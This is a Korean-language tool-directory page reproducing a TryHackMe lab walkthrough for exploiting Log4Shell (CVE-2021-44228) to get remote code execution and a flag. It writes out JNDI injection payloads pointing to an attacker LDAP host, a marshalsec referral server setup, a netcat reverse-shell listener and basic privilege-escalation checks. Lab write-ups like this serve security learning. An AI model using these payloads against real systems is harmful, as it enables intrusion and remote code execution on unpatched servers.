Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Solar-exploiting-log-4j — 단계별 TryHackMe 워크스루: Log4Shell 취약점(CVE-2021-44228)을 악용하여 원격 코드 실행을 달성하고 플래그를 획득하는 방법. | Kitploit
도구/GitHubGitHub/lathika-3006/solar-exploiting-log-4j
Privilege EscalationReconnaissanceVulnerability AnalysisExploitationReverse EngineeringWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHublathika-3006/solar-exploiting-log-4j

Solar-exploiting-log-4j

단계별 TryHackMe 워크스루: Log4Shell 취약점(CVE-2021-44228)을 악용하여 원격 코드 실행을 달성하고 플래그를 획득하는 방법.

저장소 보기
2166개월 전아직 검토되지 않음

🔥 Solar Exploiting Log4j - TryHackMe 워크스루

📌 룸: Solar Exploiting Log4j

플랫폼: TryHackMe 난이도: 중간 주제: Log4Shell (Log4j 취약점)


🧠 목표

Log4j 취약점(CVE-2021-44228)을 악용하여 원격 코드 실행 권한을 획득하고 플래그를 캡처합니다.


🛠️ 사용 도구

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 1단계: 정찰

🔍 대상 스캔

nmap -sC -sV <TARGET_IP>

📌 발견 사항

  • 열린 포트: 80 (HTTP), 그 외 룸에 따라 다름
  • Java 기반 백엔드에서 실행 중인 웹 애플리케이션

🌐 2단계: 웹 열거

  • 브라우저에서 웹 애플리케이션 방문
  • 입력 필드(로그인/검색/헤더)와 상호작용
  • Burp Suite를 사용하여 요청 캡처

💥 3단계: Log4j 취약점 식별

Log4j 취약점은 JNDI 주입을 허용합니다:

${jndi:ldap://<ATTACKER_IP>:1389/a}

입력이 로그에 기록되면 → 취약점이 존재합니다.


⚙️ 4단계: 리스너 설정

Netcat 시작

nc -lvnp 4444

악성 LDAP 서버 시작 (예시)

git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

LDAP 서버 실행:

java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 5단계: 페이로드 호스팅

python3 -m http.server 8000

악성 Java 클래스(Exploit.class) 생성


🚀 6단계: 익스플로잇 트리거

취약한 필드에 페이로드 주입:

${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 다음과 같은 헤더를 사용하세요:

  • User-Agent
  • X-Api-Version

🖥️ 7단계: 리버스 셸 획득

트리거되면:

  • 대상이 Netcat 리스너로 역접속
  • 셸 액세스 권한 획득

🔐 8단계: 권한 상승 (필요한 경우)

확인:

sudo -l

다음 항목을 찾으세요:

  • 잘못 구성된 SUID 바이너리
  • 쓰기 가능한 파일
  • Cron 작업

🚩 9단계: 플래그 캡처

find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 배운 핵심 개념

  • Log4Shell (CVE-2021-44228)
  • JNDI 주입
  • 원격 코드 실행 (RCE)
  • 리버스 셸
  • 웹 익스플로잇
도구 다운로드